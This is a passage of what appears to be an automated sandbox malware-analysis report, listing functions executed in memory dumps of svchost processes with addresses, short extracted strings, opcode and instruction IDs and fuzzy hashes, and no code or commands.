                                                                                                                  • Opcode Fuzzy Hash: 22228b21fbaa57b8e18db94f044399345158ca2a19d73e96e4a608bbee8fbc16
                                                                                                                  • Instruction Fuzzy Hash: 02412861A19A4E9FEB41FB7CD451AEDBBE1EF89300F444AB6D009C7293CD28E446C790
                                                                                                                  Function 00007FFAAC3D0870 Relevance: .1, Instructions: 97COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1605804387.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 51c826c5fde0086bc2c587bb110eb53d73eacfb957f731397ce6b5ce640e60c9
                                                                                                                  • Instruction ID: f63630432f5af67bf2851d2d834f62c6109c15db727bb1e56b4b0e514b5d756f
                                                                                                                  • Opcode Fuzzy Hash: 51c826c5fde0086bc2c587bb110eb53d73eacfb957f731397ce6b5ce640e60c9
                                                                                                                  • Instruction Fuzzy Hash: A631C861E59B4E4FE341E76CC0A1DAABF71FF89300B8485A5D44BC33A6EE68A901C745
                                                                                                                  Function 00007FFAAC3D2421 Relevance: .0, Instructions: 49COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1605804387.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5345f78110f1bf556e27c6e95e9a02a9bb1194b029d716c4e987e449da67dd3a
                                                                                                                  • Instruction ID: e1a3a4f1967b4707192243b6146b1cc9cd6206dc582aa5aa52a4f9a7e3ead381
                                                                                                                  • Opcode Fuzzy Hash: 5345f78110f1bf556e27c6e95e9a02a9bb1194b029d716c4e987e449da67dd3a
                                                                                                                  • Instruction Fuzzy Hash: 1B014C9480DB854FF38697385852D31BFF0CF96211B0849ABE8CDC7097E805D94583D1
                                                                                                                  Function 00007FFAAC3D0E67 Relevance: .0, Instructions: 33COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1605804387.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8ae2d00656c269b5a20d35ed1c4b498a1471283228449f71052de3c02b14c7bf
                                                                                                                  • Instruction ID: 3faf859ae5121eade8d7953db2bb38cdb29e84c1f6887b88f240f0a44105647f
                                                                                                                  • Opcode Fuzzy Hash: 8ae2d00656c269b5a20d35ed1c4b498a1471283228449f71052de3c02b14c7bf
                                                                                                                  • Instruction Fuzzy Hash: 32E0ED61B1491D8FEF80EBACD845BFCB2D2EB9C612F1042B7D50ED3292DE2898418391

                                                                                                                  Executed Functions

                                                                                                                  Function 00007FFAAC3E1779 Relevance: 7.2, Strings: 5, Instructions: 904COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2213085865.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 6$6$6$6$"r
                                                                                                                  • API String ID: 0-3979851792
                                                                                                                  • Opcode ID: 51fef5abb802c7ca03889b209a4284bdebcef0eaf26f45468052c6da0d3b76e6
                                                                                                                  • Instruction ID: 54df6ef1164afdb320249d6ab92d0e87bcf20d334787e78a66b3add0abc38bad
                                                                                                                  • Opcode Fuzzy Hash: 51fef5abb802c7ca03889b209a4284bdebcef0eaf26f45468052c6da0d3b76e6
                                                                                                                  • Instruction Fuzzy Hash: 8152C961B28E098BF794F778C459AB9B7D2EF99304F5485B9D00EC32D6DE28AC058781
                                                                                                                  Function 00007FFAAC3E2259 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2213085865.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: r6
                                                                                                                  • API String ID: 0-2984296541
                                                                                                                  • Opcode ID: 70ac903821d8569eedafb377f6a60199a3a81ba2fc51b9dd6893042182f7b771
                                                                                                                  • Instruction ID: bca5c1d949963564969d265b461ee4da6dd2de58a54eee1d12609e361703fd33
                                                                                                                  • Opcode Fuzzy Hash: 70ac903821d8569eedafb377f6a60199a3a81ba2fc51b9dd6893042182f7b771
                                                                                                                  • Instruction Fuzzy Hash: 84517551A1EAC54FE786A7788825A75BFE4DF57215B0844FBE0CDC71E3DE08880AC392
                                                                                                                  Function 00007FFAAC3E09FA Relevance: 2.6, Strings: 2, Instructions: 50COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2213085865.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: :L_^$k:L
                                                                                                                  • API String ID: 0-2007851088
                                                                                                                  • Opcode ID: 9230fcfbbb6180ac08c0492853ab96c0a328a86d55fd3ee726a4b70906cda895
                                                                                                                  • Instruction ID: 15b5c52e7b881afba9748089209746d372af56e37c5e9830df042887b49080be
                                                                                                                  • Opcode Fuzzy Hash: 9230fcfbbb6180ac08c0492853ab96c0a328a86d55fd3ee726a4b70906cda895
                                                                                                                  • Instruction Fuzzy Hash: EF01D41670A69249E7027ABDB4518FCBB90DE86375B4842B3C3C9C9173861450CB83C6
                                                                                                                  Function 00007FFAAC3E0650 Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2213085865.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: r6
                                                                                                                  • API String ID: 0-2984296541
                                                                                                                  • Opcode ID: 0317371ca1aa09b89fc3225f48f0acb769e78103c828b7e6569e30735bb4d2f7
                                                                                                                  • Instruction ID: 1cb490986950cbedf2ba80facee73020b867763d192680ebc7a403c8305cf09c
                                                                                                                  • Opcode Fuzzy Hash: 0317371ca1aa09b89fc3225f48f0acb769e78103c828b7e6569e30735bb4d2f7
                                                                                                                  • Instruction Fuzzy Hash: 93310961B1C9484FE798EB7CD45AB79B7C6EB99311F0445BEE04EC32A3DD549C028781
                                                                                                                  Function 00007FFAAC3E0D81 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2213085865.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 6
                                                                                                                  • API String ID: 0-1452363761
                                                                                                                  • Opcode ID: 5fbd5149c68bfba6f0bf3e0281f5be170467448b590b3cbba1a35084051eceb6
                                                                                                                  • Instruction ID: 00399d5fb6d490d78910dd16fb98b259e1ebddad5fd8b03cd36bfb1799ac48e9
                                                                                                                  • Opcode Fuzzy Hash: 5fbd5149c68bfba6f0bf3e0281f5be170467448b590b3cbba1a35084051eceb6
                                                                                                                  • Instruction Fuzzy Hash: A521C752B18F454FF784B7B8981ABB97BD5EF95741F0842BAE00DC3292DE189C4143D2
                                                                                                                  Function 00007FFAAC3E130D Relevance: .5, Instructions: 508COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2213085865.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 516fa31cbf3bfe4a142488fd1be26c0e803d09230c19742232228380442b6659
                                                                                                                  • Instruction ID: 31d816ec983938355d4cc8b2103e92f2a9fec25771732ecf3633715ad900d68e
                                                                                                                  • Opcode Fuzzy Hash: 516fa31cbf3bfe4a142488fd1be26c0e803d09230c19742232228380442b6659
                                                                                                                  • Instruction Fuzzy Hash: 15412562E19B4A8FE741E7BCD8658EDBBF1EF46220B4481B7C14ED71A3DE2854468390
                                                                                                                  Function 00007FFAAC3E0705 Relevance: .3, Instructions: 252COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2213085865.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4331df647e6309beb3986d2533e0751eb32f1735d0e51706b1f919b482709137
                                                                                                                  • Instruction ID: c3dbc25af194c507f602ab85607ae362c23152913a3c41a8c720df411bab9401
                                                                                                                  • Opcode Fuzzy Hash: 4331df647e6309beb3986d2533e0751eb32f1735d0e51706b1f919b482709137
                                                                                                                  • Instruction Fuzzy Hash: 86915F71A0E7894FF341FB7884A58E9BFA1EF42204754C1BAC18EC72A7C928984DC7D5
                                                                                                                  Function 00007FFAAC3E0EEE Relevance: .2, Instructions: 202COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2213085865.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1828d80f1fd6300c0d5b3ba4d0d5c1478b1aa28c24b45269b68486e66d515fbc
                                                                                                                  • Instruction ID: e77ac94fe5ff11656be2185e48889b626cbbb58aded612a82b440d645f8da5af
                                                                                                                  • Opcode Fuzzy Hash: 1828d80f1fd6300c0d5b3ba4d0d5c1478b1aa28c24b45269b68486e66d515fbc
                                                                                                                  • Instruction Fuzzy Hash: B2510862A0EA860FE356A73C94569B97BD5DF87224B0980FBD08DC71A3DD1C58478391
                                                                                                                  Function 00007FFAAC3E0A68 Relevance: .2, Instructions: 181COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2213085865.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cc4d059a1d90347ae5dc6901ef82fcd7afcbf9af70853d7d6d2d1eacbfbd5047
                                                                                                                  • Instruction ID: 2b2d77b003571fc431df50fb8e09fe26fdfe0a16b02ca9b910284e311fd7cf63
                                                                                                                  • Opcode Fuzzy Hash: cc4d059a1d90347ae5dc6901ef82fcd7afcbf9af70853d7d6d2d1eacbfbd5047
                                                                                                                  • Instruction Fuzzy Hash: B341391770A9675AEA017A7CF8429E97F54DF8237574C82B7C249CB1B3CA25A08F83D1
                                                                                                                  Function 00007FFAAC3E0BF3 Relevance: .2, Instructions: 156COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2213085865.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6dc86460dc6390b42531ee7c87ccbdc35d0e3334057bfdf106245c864a517ab8
                                                                                                                  • Instruction ID: e38abaf4b9ddb09f90c793b6457b9ed4e99878f35d94dd12cd4f27fed74221c1
                                                                                                                  • Opcode Fuzzy Hash: 6dc86460dc6390b42531ee7c87ccbdc35d0e3334057bfdf106245c864a517ab8
                                                                                                                  • Instruction Fuzzy Hash: 40412861A18A4A8FEB41FBBCC455AED7BE1FF89300F548575D109D72A3CE28A449C790
                                                                                                                  Function 00007FFAAC3E0870 Relevance: .1, Instructions: 97COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2213085865.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bfc2702da2d0f61228ff2b62165288d44102474de4634bcb3120f979f9a9480d
                                                                                                                  • Instruction ID: 940f6433e0c60cb8f29c6858ed004ec1b1b5311bbddab1f25f1a30e7187bf560
                                                                                                                  • Opcode Fuzzy Hash: bfc2702da2d0f61228ff2b62165288d44102474de4634bcb3120f979f9a9480d
                                                                                                                  • Instruction Fuzzy Hash: A5317B6061C74D8FE385F778C099DAEBBB1BF89208790C1A5D50BC33AADD2C78488755
                                                                                                                  Function 00007FFAAC3E2421 Relevance: .0, Instructions: 49COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2213085865.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 297067f7d5d4ccfcdf435debd3b29cade89c8aab523d5837a1680b851e9c2b2d
                                                                                                                  • Instruction ID: 55c14ad9b86d1616dadd0e6ff29f8be0ad86616db9dd5c52ec362fe37187098b
                                                                                                                  • Opcode Fuzzy Hash: 297067f7d5d4ccfcdf435debd3b29cade89c8aab523d5837a1680b851e9c2b2d
                                                                                                                  • Instruction Fuzzy Hash: 2F017B8480DB818FF345A3385855C31BFE0CFA6210B0841AAE8CDC60A7D908A94887D2
                                                                                                                  Function 00007FFAAC3E0E67 Relevance: .0, Instructions: 33COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2213085865.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffaac3e0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a431df8fcd2aed9a4eee9937ef202b9ca19e7439564d1208c32a972d7a9bd1db
                                                                                                                  • Instruction ID: fbc3eadb7e2b5f4c04fcbbee2bb14f0a40892a2e308d7e00b6926a4e2e202378
                                                                                                                  • Opcode Fuzzy Hash: a431df8fcd2aed9a4eee9937ef202b9ca19e7439564d1208c32a972d7a9bd1db
                                                                                                                  • Instruction Fuzzy Hash: 26E0ED61B1491D8FEF80EBACD845BFCB2D2EB9C252F1441B7D50ED3292DE2898418391

                                                                                                                  Executed Functions

                                                                                                                  Function 00007FFAAC3C1779 Relevance: 7.2, Strings: 5, Instructions: 904COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2800404127.00007FFAAC3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ffaac3c0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 6$6$6$6$"r
                                                                                                                  • API String ID: 0-3979851792
                                                                                                                  • Opcode ID: dd8f8915009b8f7535c8766aead9c3a8b3b983075bc2c563f04e4a62d1f0617d
                                                                                                                  • Instruction ID: 0bb0a73f715d69f99cb31b1bfe1781604a1ead24133d18d2858a64614d1bfeb3
                                                                                                                  • Opcode Fuzzy Hash: dd8f8915009b8f7535c8766aead9c3a8b3b983075bc2c563f04e4a62d1f0617d
                                                                                                                  • Instruction Fuzzy Hash: EC520660B2CE498BF798FB78C455ABCB7D2EF89301F4445B9D04EC3296DE28AC059791
                                                                                                                  Function 00007FFAAC3C2259 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2800404127.00007FFAAC3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ffaac3c0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: r6
                                                                                                                  • API String ID: 0-2984296541
                                                                                                                  • Opcode ID: f54596030be28dad3875ea9cede69dd86628bf303237059c747f6c78729149cb
                                                                                                                  • Instruction ID: 92362bb7e5e07309a424bdd5345ec6e9798b68df0acb2dad6543ab3e4d7fb245
                                                                                                                  • Opcode Fuzzy Hash: f54596030be28dad3875ea9cede69dd86628bf303237059c747f6c78729149cb
                                                                                                                  • Instruction Fuzzy Hash: 72516551A0EAC54FE787A7788825A79BFE4DF47215B0844FBE0CDC71A3DD08880AC392
                                                                                                                  Function 00007FFAAC3C09FA Relevance: 2.6, Strings: 2, Instructions: 52COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2800404127.00007FFAAC3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ffaac3c0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: :N_^$k:N
                                                                                                                  • API String ID: 0-2639712577
                                                                                                                  • Opcode ID: 94c0bbb95b8c00cb18e14028dbd8e62823aa485b0d5b13b706d60f8777c7cb73
                                                                                                                  • Instruction ID: 879c2cb1ca7a6e3dad6a020022f98f70ce9ab12e300b88741d3885277efa70bb
                                                                                                                  • Opcode Fuzzy Hash: 94c0bbb95b8c00cb18e14028dbd8e62823aa485b0d5b13b706d60f8777c7cb73
                                                                                                                  • Instruction Fuzzy Hash: E001F71B7096A14AE70277BDF4609ECEF90CE85375B0842B3C3C9CD163851454C683C1
                                                                                                                  Function 00007FFAAC3C0650 Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2800404127.00007FFAAC3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ffaac3c0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: r6
                                                                                                                  • API String ID: 0-2984296541
                                                                                                                  • Opcode ID: 42591157d846583f2ef2bc3c27f38188ea7465687c0d6e944a8a45bcae8de839
                                                                                                                  • Instruction ID: 625712572070d6c6a2ed988d05418c41a06e587ca65c3d5d397c9a742acb6673
                                                                                                                  • Opcode Fuzzy Hash: 42591157d846583f2ef2bc3c27f38188ea7465687c0d6e944a8a45bcae8de839
                                                                                                                  • Instruction Fuzzy Hash: 4031D761B1C9484FE798EB7CD45AB79B7C6EB99311F0445BEE04EC32A3DD289C468381
                                                                                                                  Function 00007FFAAC3C0D81 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2800404127.00007FFAAC3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ffaac3c0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 6
                                                                                                                  • API String ID: 0-1452363761
                                                                                                                  • Opcode ID: 85113a7339c0f6920db5e42432dd03e4e7af56b9f5ead5a441e45ed0abf1b1b6
                                                                                                                  • Instruction ID: 6e1c60ab10af80df764af0c323bdeaaa2460f75700e8f8b73ee150b47e72af78
                                                                                                                  • Opcode Fuzzy Hash: 85113a7339c0f6920db5e42432dd03e4e7af56b9f5ead5a441e45ed0abf1b1b6
                                                                                                                  • Instruction Fuzzy Hash: C821E552B1CF454FF785A7B8981AB7DABD5EF95700F0842BAE04DC32A2DD189C0543D2
                                                                                                                  Function 00007FFAAC3C130D Relevance: .5, Instructions: 514COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2800404127.00007FFAAC3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ffaac3c0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 894befa53abd3e733d8f3400dafe49263979e61f0cd1bcf7bbd1b839f4cb1977
                                                                                                                  • Instruction ID: 35e86c9ae07cdf5a668c02b4f89fc560a6d7f0eba2d615904ee4fbd53df406d3
                                                                                                                  • Opcode Fuzzy Hash: 894befa53abd3e733d8f3400dafe49263979e61f0cd1bcf7bbd1b839f4cb1977
                                                                                                                  • Instruction Fuzzy Hash: 62412962E1DB4A8FE741E7BCD8658ECBFB1EF46211B4441B7C14ED71A3DE28580A9390
                                                                                                                  Function 00007FFAAC3C0EEE Relevance: .2, Instructions: 202COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2800404127.00007FFAAC3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ffaac3c0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 84151cd4f5acb2115bf7e8d50573b8c9d3466bc254d93b2bb9e89277c3f59c0e
                                                                                                                  • Instruction ID: 4be5e1aade725a19e830d469e52c9c3683189d8a93f593b1e26ce2bc8d78c936
                                                                                                                  • Opcode Fuzzy Hash: 84151cd4f5acb2115bf7e8d50573b8c9d3466bc254d93b2bb9e89277c3f59c0e
                                                                                                                  • Instruction Fuzzy Hash: 6E510762A0EAC60FE356A73C98569B97BD5DF87220B0940FBD08DC71A3DC18984783A1
                                                                                                                  Function 00007FFAAC3C0A68 Relevance: .2, Instructions: 188COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2800404127.00007FFAAC3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ffaac3c0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 77e17f1bffaa861dbced9ee3d0d04bd0a44bd8f5ed4fd9ada0910b24e3297ef6
                                                                                                                  • Instruction ID: 0a654d5c80771c532de9cbfb64af59712d69521bcc4fb4517f4b502766de3def
                                                                                                                  • Opcode Fuzzy Hash: 77e17f1bffaa861dbced9ee3d0d04bd0a44bd8f5ed4fd9ada0910b24e3297ef6
                                                                                                                  • Instruction Fuzzy Hash: 4441181B70EA768AEA017B7CF851AD9BF94DF8137574C82B7C349CB1A3C954608A83D0
                                                                                                                  Function 00007FFAAC3C0BF3 Relevance: .2, Instructions: 158COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2800404127.00007FFAAC3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ffaac3c0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ab7ca9a9a2344d11344406419dc00320344b380aa946bc87dcf1f771aaa18297
                                                                                                                  • Instruction ID: cd7fb8f15b28a6d5c78aeaeeb44b365e2d0f19484a07958a09c769778d59ec6d
                                                                                                                  • Opcode Fuzzy Hash: ab7ca9a9a2344d11344406419dc00320344b380aa946bc87dcf1f771aaa18297
                                                                                                                  • Instruction Fuzzy Hash: 9E414665A1CB9E8FEB45FBBCC451AEDBBE1EF89311F448576C049C3297CD28A4098790
                                                                                                                  Function 00007FFAAC3C0870 Relevance: .1, Instructions: 96COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2800404127.00007FFAAC3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ffaac3c0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e6cd55b0c2603c206b1a80c772014e789090e73b9011f4011551e2407f81e3a1
                                                                                                                  • Instruction ID: dd633e9f6d1899ccc501e7719ba9d353962dabece24e7fb8adc748ae81d22624
                                                                                                                  • Opcode Fuzzy Hash: e6cd55b0c2603c206b1a80c772014e789090e73b9011f4011551e2407f81e3a1
                                                                                                                  • Instruction Fuzzy Hash: FA31A96461C7CD8FE385F72CC091DA9BBB2AF85206B8485A5D44EC33AADE2C5900C761
                                                                                                                  Function 00007FFAAC3C2421 Relevance: .0, Instructions: 49COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2800404127.00007FFAAC3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ffaac3c0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6b980c04a4c8ab770d3c4b368e589fe52001641823e71bb280993c48717741c3
